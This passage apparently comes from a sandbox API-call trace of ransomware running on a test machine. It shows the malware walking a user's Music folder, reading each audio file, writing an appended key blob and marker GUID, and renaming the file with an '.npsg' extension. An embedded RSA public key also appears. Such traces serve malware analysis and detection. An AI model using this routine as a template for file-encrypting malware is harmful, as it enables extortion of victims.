(HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b875e8 [0238.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.912] GetCurrentThreadId () returned 0x5b4 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c38 [0238.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bd8 [0238.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bf0 [0238.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bc0 [0238.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c50 [0238.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c20 [0238.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c08 [0238.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c68 [0238.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c08 | out: hHeap=0x620000) returned 1 [0238.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c08 [0238.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c20 | out: hHeap=0x620000) returned 1 [0238.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bd8 [0238.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0238.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0238.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c08 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c50 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bf0 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bc0 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86240 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.918] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x911d, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x911d, lpOverlapped=0x0) returned 1 [0238.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0238.918] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9122, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.918] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0238.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0238.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0238.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0238.919] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.919] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.919] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.919] CloseHandle (hObject=0x644) returned 1 [0238.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0238.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b88cd0 [0238.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0238.921] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\5-Hq4ryxhg.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\5-hq4ryxhg.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\5-Hq4ryxhg.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\5-hq4ryxhg.wav.npsg")) returned 1 [0238.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.922] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0238.923] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5643d70, ftCreationTime.dwHighDateTime=0x1d5c033, ftLastAccessTime.dwLowDateTime=0xe48d0600, ftLastAccessTime.dwHighDateTime=0x1d5b5f5, ftLastWriteTime.dwLowDateTime=0xe48d0600, ftLastWriteTime.dwHighDateTime=0x1d5b5f5, nFileSizeHigh=0x0, nFileSizeLow=0x12df3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ap1era.m4a", cAlternateFileName="")) returned 1 [0238.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0238.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.923] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ap1era.m4a") returned=".m4a" [0238.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ap1era.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\ap1era.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.924] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=77299) returned 1 [0238.924] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.927] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x12dcd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.927] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.928] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.928] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x12df3, lpOverlapped=0x0) returned 1 [0238.929] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.929] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.929] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.929] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.930] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.930] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.930] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.930] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.930] GetLastError () returned 0x0 [0238.930] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.931] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.931] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.931] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.931] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.931] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0238.932] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x12df3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.932] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.932] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.932] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.932] CloseHandle (hObject=0x644) returned 1 [0238.933] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ap1era.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\ap1era.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ap1era.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\ap1era.m4a.npsg")) returned 1 [0238.935] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e161b60, ftCreationTime.dwHighDateTime=0x1d5ba94, ftLastAccessTime.dwLowDateTime=0xa12e00f0, ftLastAccessTime.dwHighDateTime=0x1d5c5ca, ftLastWriteTime.dwLowDateTime=0xa12e00f0, ftLastWriteTime.dwHighDateTime=0x1d5c5ca, nFileSizeHigh=0x0, nFileSizeLow=0x12132, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CRvW0j4zidXfJqnq.mp3", cAlternateFileName="CRVW0J~1.MP3")) returned 1 [0238.935] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\CRvW0j4zidXfJqnq.mp3") returned=".mp3" [0238.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\CRvW0j4zidXfJqnq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\crvw0j4zidxfjqnq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.935] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=74034) returned 1 [0238.935] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.937] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1210c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.938] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.939] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x12132, lpOverlapped=0x0) returned 1 [0238.940] lstrlenA (lpString="-----BEGIN PUBLIC 